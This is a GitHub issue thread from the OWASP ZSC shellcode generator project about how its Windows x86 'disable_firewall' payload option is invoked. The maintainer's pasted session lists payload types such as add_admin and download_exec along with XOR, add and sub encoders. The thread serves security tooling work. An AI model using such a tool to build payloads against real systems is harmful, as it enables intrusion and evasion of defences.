OWASP / ZSC

OWASP ZSC - Shellcode/Obfuscate Code Generator https://www.secologist.com/

Windows disable firewall #99

Closed jowasp closed 8 years ago

jowasp commented 8 years ago

Could you provide more details on which parameters this option takes and how it should work? I don't get any specific parameters, so I'm not sure how this should work: zsc/shellcode/generate/windows_x86/disable_firewall>

Ali-Razmjoo commented 8 years ago

Hi Johanna, as you can see, this function doesn't need any inputs.

[!] disable_firewall()
[+] windows_x86/disable_firewall/none
[+] windows_x86/disable_firewall/xor_random
[+] windows_x86/disable_firewall/add_random
[+] windows_x86/disable_firewall/sub_random
[+] windows_x86/disable_firewall/xor_yourvalue
zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate>
linux_x86   osx_x86     windows_x86
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86>
add_admin        create_file      dir_create       disable_firewall download_exec    download_tofile  exec
zsc/shellcode/generate/windows_x86> d
dir_create       disable_firewall download_exec    download_tofile
zsc/shellcode/generate/windows_x86> disable_firewall
zsc/shellcode/generate/windows_x86/disable_firewall> [I just pushed enter]

[+] none
[+] xor_random
[+] add_random
[+] sub_random
[+] xor_yourvalue

[+] enter encode type
zsc/shellcode/generate/windows_x86/disable_firewall/encode_type> none

Output assembly code?(y or n)> n
Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:

Shellcode output to a .c file?(y or n)> n
zsc>

When I chose disable_firewall and pressed Tab, nothing appeared [no inputs], so I just pressed Enter and it went to the next step. But there is a bug in the command-line version: it doesn't work with zsc.py -p windows_x86/disable_firewall/none or zsc.py -p windows_x86/disable_firewall/none -i and zsc.py -p windows_x86/disable_firewall/none -i "", so it needs to be fixed.

Thanks.

Ali-Razmjoo commented 8 years ago

Fixed, let me know if there is anything else, thanks.